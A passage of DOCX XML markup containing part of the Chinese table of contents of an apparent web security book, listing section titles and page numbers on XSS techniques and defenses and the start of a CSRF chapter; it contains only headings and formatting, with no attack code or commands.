          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>调</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-31"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>73</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>构造技巧</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>76</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>变废为宝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Mission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Impossible</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>82</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>容易被忽视的角落</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Flash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>XSS</w:t>
        <w:tab/>
        <w:t>85</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>真的高枕无忧吗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>开发框架</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>87</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1525" w:val="left" w:leader="none"/>
          <w:tab w:pos="1526" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="57" w:after="0"/>
        <w:ind w:left="1525" w:right="0" w:hanging="494"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>御</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>89</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="80" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>四两拨千斤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
        <w:tab/>
        <w:t>89</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>输入检查</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>93</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>输出检查</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>95</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>正确地防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-31"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>XSS</w:t>
        <w:tab/>
        <w:t>99</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>处理富文本</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>102</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-31"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>XSS</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>103</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>换个角度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-31"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>的风险</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>107</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="56"/>
        <w:ind w:left="1031" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:12.72pt;margin-top:19.640003pt;width:411.15pt;height:16.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:1336" coordorigin="254,393" coordsize="8223,322">
            <v:rect style="position:absolute;left:254;top:392;width:8223;height:322" filled="true" fillcolor="#dadada" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:shape style="position:absolute;left:1195;top:414;width:7261;height:283" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="7240" w:val="right" w:leader="dot"/>
                      </w:tabs>
                      <w:spacing w:line="282" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>跨</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>站</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>点</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>请</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>求</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>伪</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>造</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="3"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>（</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="3"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>CSRF</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="3"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>）</w:t>
                      <w:tab/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:spacing w:val="5"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>109</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:283;top:460;width:688;height:236" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="236" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>第 </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>4</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="-35"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>章</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="none"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>3.4</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>小结</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>107</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1525" w:val="left" w:leader="none"/>
          <w:tab w:pos="1526" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="536" w:after="0"/>
        <w:ind w:left="1525" w:right="0" w:hanging="494"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>简介</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>109</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1525" w:val="left" w:leader="none"/>
          <w:tab w:pos="1526" w:val="left" w:leader="none"/>
          <w:tab w:pos="8348" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1525" w:right="0" w:hanging="494"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>进阶</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>111</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8348" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="80" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>浏览器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-31"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
